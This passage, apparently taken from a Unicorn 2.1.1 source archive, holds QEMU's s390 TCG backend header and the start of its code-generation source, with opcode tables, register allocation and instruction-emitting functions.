EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef S390_TCG_TARGET_H #define S390_TCG_TARGET_H #define TCG_TARGET_INSN_UNIT_SIZE 2 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 19 typedef enum TCGReg { TCG_REG_R0 = 0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15 } TCGReg; #define TCG_TARGET_NB_REGS 16 /* A list of relevant facilities used by this translator. Some of these are required for proper operation, and these are checked at startup. */ #define FACILITY_ZARCH_ACTIVE (1ULL << (63 - 2)) #define FACILITY_LONG_DISP (1ULL << (63 - 18)) #define FACILITY_EXT_IMM (1ULL << (63 - 21)) #define FACILITY_GEN_INST_EXT (1ULL << (63 - 34)) #define FACILITY_LOAD_ON_COND (1ULL << (63 - 45)) #define FACILITY_FAST_BCR_SER FACILITY_LOAD_ON_COND #define FACILITY_DISTINCT_OPS FACILITY_LOAD_ON_COND #define FACILITY_LOAD_ON_COND2 (1ULL << (63 - 53)) extern uint64_t s390_facilities; /* optional instructions */ #define TCG_TARGET_HAS_div2_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 0 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_extract_i32 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_div2_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 0 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 (s390_facilities & FACILITY_EXT_IMM) #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_extract_i64 (s390_facilities & FACILITY_GEN_INST_EXT) #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 1 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_R15 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_STACK_OFFSET 160 #define TCG_TARGET_EXTEND_ARGS 1 #define TCG_TARGET_HAS_MEMORY_BSWAP 1 #define TCG_TARGET_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) enum { TCG_AREG0 = TCG_REG_R10, }; static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { } static inline void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { /* patch the branch destination */ intptr_t disp = addr - (jmp_addr - 2); atomic_set((int32_t *)jmp_addr, disp / 2); /* no need to flush icache explicitly */ } #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/s390/tcg-target.inc.c��������������������������������������������������������0000664�0000000�0000000�00000242761�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2009 Ulrich Hecht <uli@suse.de> * Copyright (c) 2009 Alexander Graf <agraf@suse.de> * Copyright (c) 2010 Richard Henderson <rth@twiddle.net> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* We only support generating code for 64-bit mode. */ #if TCG_TARGET_REG_BITS != 64 #error "unsupported code generation mode" #endif #include "../tcg-pool.inc.c" #include "elf.h" /* ??? The translation blocks produced by TCG are generally small enough to be entirely reachable with a 16-bit displacement. Leaving the option for a 32-bit displacement here Just In Case. */ #define USE_LONG_BRANCHES 0 #define TCG_CT_CONST_S16 0x100 #define TCG_CT_CONST_S32 0x200 #define TCG_CT_CONST_S33 0x400 #define TCG_CT_CONST_ZERO 0x800 /* Several places within the instruction set 0 means "no register" rather than TCG_REG_R0. */ #define TCG_REG_NONE 0 /* A scratch register that may be be used throughout the backend. */ #define TCG_TMP0 TCG_REG_R1 /* A scratch register that holds a pointer to the beginning of the TB. We don't need this when we have pc-relative loads with the general instructions extension facility. */ #define TCG_REG_TB TCG_REG_R12 #define USE_REG_TB (!(s390_facilities & FACILITY_GEN_INST_EXT)) #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG TCG_REG_R13 #endif /* All of the following instructions are prefixed with their instruction format, and are defined as 8- or 16-bit quantities, even when the two halves of the 16-bit quantity may appear 32 bits apart in the insn. This makes it easy to copy the values from the tables in Appendix B. */ typedef enum S390Opcode { RIL_AFI = 0xc209, RIL_AGFI = 0xc208, RIL_ALFI = 0xc20b, RIL_ALGFI = 0xc20a, RIL_BRASL = 0xc005, RIL_BRCL = 0xc004, RIL_CFI = 0xc20d, RIL_CGFI = 0xc20c, RIL_CLFI = 0xc20f, RIL_CLGFI = 0xc20e, RIL_CLRL = 0xc60f, RIL_CLGRL = 0xc60a, RIL_CRL = 0xc60d, RIL_CGRL = 0xc608, RIL_IIHF = 0xc008, RIL_IILF = 0xc009, RIL_LARL = 0xc000, RIL_LGFI = 0xc001, RIL_LGRL = 0xc408, RIL_LLIHF = 0xc00e, RIL_LLILF = 0xc00f, RIL_LRL = 0xc40d, RIL_MSFI = 0xc201, RIL_MSGFI = 0xc200, RIL_NIHF = 0xc00a, RIL_NILF = 0xc00b, RIL_OIHF = 0xc00c, RIL_OILF = 0xc00d, RIL_SLFI = 0xc205, RIL_SLGFI = 0xc204, RIL_XIHF = 0xc006, RIL_XILF = 0xc007, RI_AGHI = 0xa70b, RI_AHI = 0xa70a, RI_BRC = 0xa704, RI_CHI = 0xa70e, RI_CGHI = 0xa70f, RI_IIHH = 0xa500, RI_IIHL = 0xa501, RI_IILH = 0xa502, RI_IILL = 0xa503, RI_LGHI = 0xa709, RI_LLIHH = 0xa50c, RI_LLIHL = 0xa50d, RI_LLILH = 0xa50e, RI_LLILL = 0xa50f, RI_MGHI = 0xa70d, RI_MHI = 0xa70c, RI_NIHH = 0xa504, RI_NIHL = 0xa505, RI_NILH = 0xa506, RI_NILL = 0xa507, RI_OIHH = 0xa508, RI_OIHL = 0xa509, RI_OILH = 0xa50a, RI_OILL = 0xa50b, RIE_CGIJ = 0xec7c, RIE_CGRJ = 0xec64, RIE_CIJ = 0xec7e, RIE_CLGRJ = 0xec65, RIE_CLIJ = 0xec7f, RIE_CLGIJ = 0xec7d, RIE_CLRJ = 0xec77, RIE_CRJ = 0xec76, RIE_LOCGHI = 0xec46, RIE_RISBG = 0xec55, RRE_AGR = 0xb908, RRE_ALGR = 0xb90a, RRE_ALCR = 0xb998, RRE_ALCGR = 0xb988, RRE_CGR = 0xb920, RRE_CLGR = 0xb921, RRE_DLGR = 0xb987, RRE_DLR = 0xb997, RRE_DSGFR = 0xb91d, RRE_DSGR = 0xb90d, RRE_FLOGR = 0xb983, RRE_LGBR = 0xb906, RRE_LCGR = 0xb903, RRE_LGFR = 0xb914, RRE_LGHR = 0xb907, RRE_LGR = 0xb904, RRE_LLGCR = 0xb984, RRE_LLGFR = 0xb916, RRE_LLGHR = 0xb985, RRE_LRVR = 0xb91f, RRE_LRVGR = 0xb90f, RRE_LTGR = 0xb902, RRE_MLGR = 0xb986, RRE_MSGR = 0xb90c, RRE_MSR = 0xb252, RRE_NGR = 0xb980, RRE_OGR = 0xb981, RRE_SGR = 0xb909, RRE_SLGR = 0xb90b, RRE_SLBR = 0xb999, RRE_SLBGR = 0xb989, RRE_XGR = 0xb982, RRF_LOCR = 0xb9f2, RRF_LOCGR = 0xb9e2, RRF_NRK = 0xb9f4, RRF_NGRK = 0xb9e4, RRF_ORK = 0xb9f6, RRF_OGRK = 0xb9e6, RRF_SRK = 0xb9f9, RRF_SGRK = 0xb9e9, RRF_SLRK = 0xb9fb, RRF_SLGRK = 0xb9eb, RRF_XRK = 0xb9f7, RRF_XGRK = 0xb9e7, RR_AR = 0x1a, RR_ALR = 0x1e, RR_BASR = 0x0d, RR_BCR = 0x07, RR_CLR = 0x15, RR_CR = 0x19, RR_DR = 0x1d, RR_LCR = 0x13, RR_LR = 0x18, RR_LTR = 0x12, RR_NR = 0x14, RR_OR = 0x16, RR_SR = 0x1b, RR_SLR = 0x1f, RR_XR = 0x17, RSY_RLL = 0xeb1d, RSY_RLLG = 0xeb1c, RSY_SLLG = 0xeb0d, RSY_SLLK = 0xebdf, RSY_SRAG = 0xeb0a, RSY_SRAK = 0xebdc, RSY_SRLG = 0xeb0c, RSY_SRLK = 0xebde, RS_SLL = 0x89, RS_SRA = 0x8a, RS_SRL = 0x88, RXY_AG = 0xe308, RXY_AY = 0xe35a, RXY_CG = 0xe320, RXY_CLG = 0xe321, RXY_CLY = 0xe355, RXY_CY = 0xe359, RXY_LAY = 0xe371, RXY_LB = 0xe376, RXY_LG = 0xe304, RXY_LGB = 0xe377, RXY_LGF = 0xe314, RXY_LGH = 0xe315, RXY_LHY = 0xe378, RXY_LLGC = 0xe390, RXY_LLGF = 0xe316, RXY_LLGH = 0xe391, RXY_LMG = 0xeb04, RXY_LRV = 0xe31e, RXY_LRVG = 0xe30f, RXY_LRVH = 0xe31f, RXY_LY = 0xe358, RXY_NG = 0xe380, RXY_OG = 0xe381, RXY_STCY = 0xe372, RXY_STG = 0xe324, RXY_STHY = 0xe370, RXY_STMG = 0xeb24, RXY_STRV = 0xe33e, RXY_STRVG = 0xe32f, RXY_STRVH = 0xe33f, RXY_STY = 0xe350, RXY_XG = 0xe382, RX_A = 0x5a, RX_C = 0x59, RX_L = 0x58, RX_LA = 0x41, RX_LH = 0x48, RX_ST = 0x50, RX_STC = 0x42, RX_STH = 0x40, NOP = 0x0707, } S390Opcode; #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8", "%r9", "%r10" "%r11" "%r12" "%r13" "%r14" "%r15" }; #endif /* Since R6 is a potential argument register, choose it last of the call-saved registers. Likewise prefer the call-clobbered registers in reverse order to maximize the chance of avoiding the arguments. */ static const int tcg_target_reg_alloc_order[] = { /* Call saved registers. */ TCG_REG_R13, TCG_REG_R12, TCG_REG_R11, TCG_REG_R10, TCG_REG_R9, TCG_REG_R8, TCG_REG_R7, TCG_REG_R6, /* Call clobbered registers. */ TCG_REG_R14, TCG_REG_R0, TCG_REG_R1, /* Argument registers, in reverse order of allocation. */ TCG_REG_R5, TCG_REG_R4, TCG_REG_R3, TCG_REG_R2, }; static const int tcg_target_call_iarg_regs[] = { TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_R2, }; #define S390_CC_EQ 8 #define S390_CC_LT 4 #define S390_CC_GT 2 #define S390_CC_OV 1 #define S390_CC_NE (S390_CC_LT | S390_CC_GT) #define S390_CC_LE (S390_CC_LT | S390_CC_EQ) #define S390_CC_GE (S390_CC_GT | S390_CC_EQ) #define S390_CC_NEVER 0 #define S390_CC_ALWAYS 15 /* Condition codes that result from a COMPARE and COMPARE LOGICAL. */ static const uint8_t tcg_cond_to_s390_cond[] = { [TCG_COND_EQ] = S390_CC_EQ, [TCG_COND_NE] = S390_CC_NE, [TCG_COND_LT] = S390_CC_LT, [TCG_COND_LE] = S390_CC_LE, [TCG_COND_GT] = S390_CC_GT, [TCG_COND_GE] = S390_CC_GE, [TCG_COND_LTU] = S390_CC_LT, [TCG_COND_LEU] = S390_CC_LE, [TCG_COND_GTU] = S390_CC_GT, [TCG_COND_GEU] = S390_CC_GE, }; /* Condition codes that result from a LOAD AND TEST. Here, we have no unsigned instruction variation, however since the test is vs zero we can re-map the outcomes appropriately. */ static const uint8_t tcg_cond_to_ltr_cond[] = { [TCG_COND_EQ] = S390_CC_EQ, [TCG_COND_NE] = S390_CC_NE, [TCG_COND_LT] = S390_CC_LT, [TCG_COND_LE] = S390_CC_LE, [TCG_COND_GT] = S390_CC_GT, [TCG_COND_GE] = S390_CC_GE, [TCG_COND_LTU] = S390_CC_NEVER, [TCG_COND_LEU] = S390_CC_EQ, [TCG_COND_GTU] = S390_CC_NE, [TCG_COND_GEU] = S390_CC_ALWAYS, }; #ifdef CONFIG_SOFTMMU static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LESL] = helper_le_ldsl_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BESL] = helper_be_ldsl_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; #endif static tcg_insn_unit *tb_ret_addr; uint64_t s390_facilities; static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { intptr_t pcrel2; uint32_t old; value += addend; pcrel2 = (tcg_insn_unit *)value - code_ptr; switch (type) { case R_390_PC16DBL: if (pcrel2 == (int16_t)pcrel2) { tcg_patch16(code_ptr, pcrel2); return true; } break; case R_390_PC32DBL: if (pcrel2 == (int32_t)pcrel2) { tcg_patch32(code_ptr, pcrel2); return true; } break; case R_390_20: if (value == sextract64(value, 0, 20)) { old = *(uint32_t *)code_ptr & 0xf00000ff; old |= ((value & 0xfff) << 16) | ((value & 0xff000) >> 4); tcg_patch32(code_ptr, old); return true; } break; default: g_assert_not_reached(); } return false; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': /* all registers */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; break; case 'L': /* qemu_ld/st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); break; case 'a': /* force R2 for division */ ct->ct |= TCG_CT_REG; ct->u.regs = 0; tcg_regset_set_reg(ct->u.regs, TCG_REG_R2); break; case 'b': /* force R3 for division */ ct->ct |= TCG_CT_REG; ct->u.regs = 0; tcg_regset_set_reg(ct->u.regs, TCG_REG_R3); break; case 'A': ct->ct |= TCG_CT_CONST_S33; break; case 'I': ct->ct |= TCG_CT_CONST_S16; break; case 'J': ct->ct |= TCG_CT_CONST_S32; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* Test if a constant matches the constraint. */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } /* The following are mutually exclusive. */ if (ct & TCG_CT_CONST_S16) { return val == (int16_t)val; } else if (ct & TCG_CT_CONST_S32) { return val == (int32_t)val; } else if (ct & TCG_CT_CONST_S33) { return val >= -0xffffffffll && val <= 0xffffffffll; } else if (ct & TCG_CT_CONST_ZERO) { return val == 0; } return 0; } /* Emit instructions according to the given instruction format. */ static void tcg_out_insn_RR(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) { tcg_out16(s, (op << 8) | (r1 << 4) | r2); } static void tcg_out_insn_RRE(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2) { tcg_out32(s, (op << 16) | (r1 << 4) | r2); } static void tcg_out_insn_RRF(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg r2, int m3) { tcg_out32(s, (op << 16) | (m3 << 12) | (r1 << 4) | r2); } static void tcg_out_insn_RI(TCGContext *s, S390Opcode op, TCGReg r1, int i2) { tcg_out32(s, (op << 16) | (r1 << 20) | (i2 & 0xffff)); } static void tcg_out_insn_RIE(TCGContext *s, S390Opcode op, TCGReg r1, int i2, int m3) { tcg_out16(s, (op & 0xff00) | (r1 << 4) | m3); tcg_out32(s, (i2 << 16) | (op & 0xff)); } static void tcg_out_insn_RIL(TCGContext *s, S390Opcode op, TCGReg r1, int i2) { tcg_out16(s, op | (r1 << 4)); tcg_out32(s, i2); } static void tcg_out_insn_RS(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg b2, TCGReg r3, int disp) { tcg_out32(s, (op << 24) | (r1 << 20) | (r3 << 16) | (b2 << 12) | (disp & 0xfff)); } static void tcg_out_insn_RSY(TCGContext *s, S390Opcode op, TCGReg r1, TCGReg b2, TCGReg r3, int disp) { tcg_out16(s, (op & 0xff00) | (r1 << 4) | r3); tcg_out32(s, (op & 0xff) | (b2 << 28) | ((disp & 0xfff) << 16) | ((disp & 0xff000) >> 4)); } #define tcg_out_insn_RX tcg_out_insn_RS #define tcg_out_insn_RXY tcg_out_insn_RSY /* Emit an opcode with "type-checking" of the format. */ #define tcg_out_insn(S, FMT, OP, ...) \ glue(tcg_out_insn_,FMT)(S, glue(glue(FMT,_),OP), ## __VA_ARGS__) /* emit 64-bit shifts */ static void tcg_out_sh64(TCGContext* s, S390Opcode op, TCGReg dest, TCGReg src, TCGReg sh_reg, int sh_imm) { tcg_out_insn_RSY(s, op, dest, sh_reg, src, sh_imm); } /* emit 32-bit shifts */ static void tcg_out_sh32(TCGContext* s, S390Opcode op, TCGReg dest, TCGReg sh_reg, int sh_imm) { tcg_out_insn_RS(s, op, dest, sh_reg, 0, sh_imm); } static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) { if (src != dst) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, LR, dst, src); } else { tcg_out_insn(s, RRE, LGR, dst, src); } } return true; } static const S390Opcode lli_insns[4] = { RI_LLILL, RI_LLILH, RI_LLIHL, RI_LLIHH }; static bool maybe_out_small_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval) { tcg_target_ulong uval = sval; int i; if (type == TCG_TYPE_I32) { uval = (uint32_t)sval; sval = (int32_t)sval; } /* Try all 32-bit insns that can load it in one go. */ if (sval >= -0x8000 && sval < 0x8000) { tcg_out_insn(s, RI, LGHI, ret, sval); return true; } for (i = 0; i < 4; i++) { tcg_target_long mask = 0xffffull << i*16; if ((uval & mask) == uval) { tcg_out_insn_RI(s, lli_insns[i], ret, uval >> i*16); return true; } } return false; } /* load a register with an immediate value */ static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval, bool in_prologue) { tcg_target_ulong uval; /* Try all 32-bit insns that can load it in one go. */ if (maybe_out_small_movi(s, type, ret, sval)) { return; } uval = sval; if (type == TCG_TYPE_I32) { uval = (uint32_t)sval; sval = (int32_t)sval; } /* Try all 48-bit insns that can load it in one go. */ if (s390_facilities & FACILITY_EXT_IMM) { if (sval == (int32_t)sval) { tcg_out_insn(s, RIL, LGFI, ret, sval); return; } if (uval <= 0xffffffff) { tcg_out_insn(s, RIL, LLILF, ret, uval); return; } if ((uval & 0xffffffff) == 0) { tcg_out_insn(s, RIL, LLIHF, ret, uval >> 32); return; } } /* Try for PC-relative address load. For odd addresses, attempt to use an offset from the start of the TB. */ if ((sval & 1) == 0) { ptrdiff_t off = tcg_pcrel_diff(s, (void *)sval) >> 1; if (off == (int32_t)off) { tcg_out_insn(s, RIL, LARL, ret, off); return; } } else if (USE_REG_TB && !in_prologue) { ptrdiff_t off = sval - (uintptr_t)s->code_gen_ptr; if (off == sextract64(off, 0, 20)) { /* This is certain to be an address within TB, and therefore OFF will be negative; don't try RX_LA. */ tcg_out_insn(s, RXY, LAY, ret, TCG_REG_TB, TCG_REG_NONE, off); return; } } /* A 32-bit unsigned value can be loaded in 2 insns. And given that LLILL, LLIHL, LLILF above did not succeed, we know that both insns are required. */ if (uval <= 0xffffffff) { tcg_out_insn(s, RI, LLILL, ret, uval); tcg_out_insn(s, RI, IILH, ret, uval >> 16); return; } /* Otherwise, stuff it in the constant pool. */ if (s390_facilities & FACILITY_GEN_INST_EXT) { tcg_out_insn(s, RIL, LGRL, ret, 0); new_pool_label(s, sval, R_390_PC32DBL, s->code_ptr - 2, 2); } else if (USE_REG_TB && !in_prologue) { tcg_out_insn(s, RXY, LG, ret, TCG_REG_TB, TCG_REG_NONE, 0); new_pool_label(s, sval, R_390_20, s->code_ptr - 2, -(intptr_t)s->code_gen_ptr); } else { TCGReg base = ret ? ret : TCG_TMP0; tcg_out_insn(s, RIL, LARL, base, 0); new_pool_label(s, sval, R_390_PC32DBL, s->code_ptr - 2, 2); tcg_out_insn(s, RXY, LG, ret, base, TCG_REG_NONE, 0); } } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long sval) { tcg_out_movi_int(s, type, ret, sval, false); } /* Emit a load/store type instruction. Inputs are: DATA: The register to be loaded or stored. BASE+OFS: The effective address. OPC_RX: If the operation has an RX format opcode (e.g. STC), otherwise 0. OPC_RXY: The RXY format opcode for the operation (e.g. STCY). */ static void tcg_out_mem(TCGContext *s, S390Opcode opc_rx, S390Opcode opc_rxy, TCGReg data, TCGReg base, TCGReg index, tcg_target_long ofs) { if (ofs < -0x80000 || ofs >= 0x80000) { /* Combine the low 20 bits of the offset with the actual load insn; the high 44 bits must come from an immediate load. */ tcg_target_long low = ((ofs & 0xfffff) ^ 0x80000) - 0x80000; tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - low); ofs = low; /* If we were already given an index register, add it in. */ if (index != TCG_REG_NONE) { tcg_out_insn(s, RRE, AGR, TCG_TMP0, index); } index = TCG_TMP0; } if (opc_rx && ofs >= 0 && ofs < 0x1000) { tcg_out_insn_RX(s, opc_rx, data, base, index, ofs); } else { tcg_out_insn_RXY(s, opc_rxy, data, base, index, ofs); } } /* load data without address translation or endianness conversion */ static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg data, TCGReg base, intptr_t ofs) { if (type == TCG_TYPE_I32) { tcg_out_mem(s, RX_L, RXY_LY, data, base, TCG_REG_NONE, ofs); } else { tcg_out_mem(s, 0, RXY_LG, data, base, TCG_REG_NONE, ofs); } } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg data, TCGReg base, intptr_t ofs) { if (type == TCG_TYPE_I32) { tcg_out_mem(s, RX_ST, RXY_STY, data, base, TCG_REG_NONE, ofs); } else { tcg_out_mem(s, 0, RXY_STG, data, base, TCG_REG_NONE, ofs); } } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } /* load data from an absolute host address */ static void tcg_out_ld_abs(TCGContext *s, TCGType type, TCGReg dest, void *abs) { intptr_t addr = (intptr_t)abs; if ((s390_facilities & FACILITY_GEN_INST_EXT) && !(addr & 1)) { ptrdiff_t disp = tcg_pcrel_diff(s, abs) >> 1; if (disp == (int32_t)disp) { if (type == TCG_TYPE_I32) { tcg_out_insn(s, RIL, LRL, dest, disp); } else { tcg_out_insn(s, RIL, LGRL, dest, disp); } return; } } if (USE_REG_TB) { ptrdiff_t disp = abs - (void *)s->code_gen_ptr; if (disp == sextract64(disp, 0, 20)) { tcg_out_ld(s, type, dest, TCG_REG_TB, disp); return; } } tcg_out_movi(s, TCG_TYPE_PTR, dest, addr & ~0xffff); tcg_out_ld(s, type, dest, dest, addr & 0xffff); } static inline void tcg_out_risbg(TCGContext *s, TCGReg dest, TCGReg src, int msb, int lsb, int ofs, int z) { /* Format RIE-f */ tcg_out16(s, (RIE_RISBG & 0xff00) | (dest << 4) | src); tcg_out16(s, (msb << 8) | (z << 7) | lsb); tcg_out16(s, (ofs << 8) | (RIE_RISBG & 0xff)); } static void tgen_ext8s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LGBR, dest, src); return; } if (type == TCG_TYPE_I32) { if (dest == src) { tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 24); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 24); } tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 24); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 56); tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 56); } } static void tgen_ext8u(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LLGCR, dest, src); return; } if (dest == src) { tcg_out_movi(s, type, TCG_TMP0, 0xff); src = TCG_TMP0; } else { tcg_out_movi(s, type, dest, 0xff); } if (type == TCG_TYPE_I32) { tcg_out_insn(s, RR, NR, dest, src); } else { tcg_out_insn(s, RRE, NGR, dest, src); } } static void tgen_ext16s(TCGContext *s, TCGType type, TCGReg dest, TCGReg src) { if (s390_facilities & FACILITY_EXT_IMM) { tcg_out_insn(s, RRE, LGHR, dest, src); return; } if (type == TCG_TYPE_I32) { if (dest == src) { tcg_out_sh32(s, RS_SLL, dest, TCG_REG_NONE, 16); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 16); } tcg_out_sh32(s, RS_SRA, dest, TCG_REG_NONE, 16); } else { tcg_out_sh64(s, RSY_SLLG, dest, src, TCG_REG_NONE, 48); tcg_out_sh64(s, RSY_SRAG, dest, dest, TCG_REG_NONE, 48); } } static void 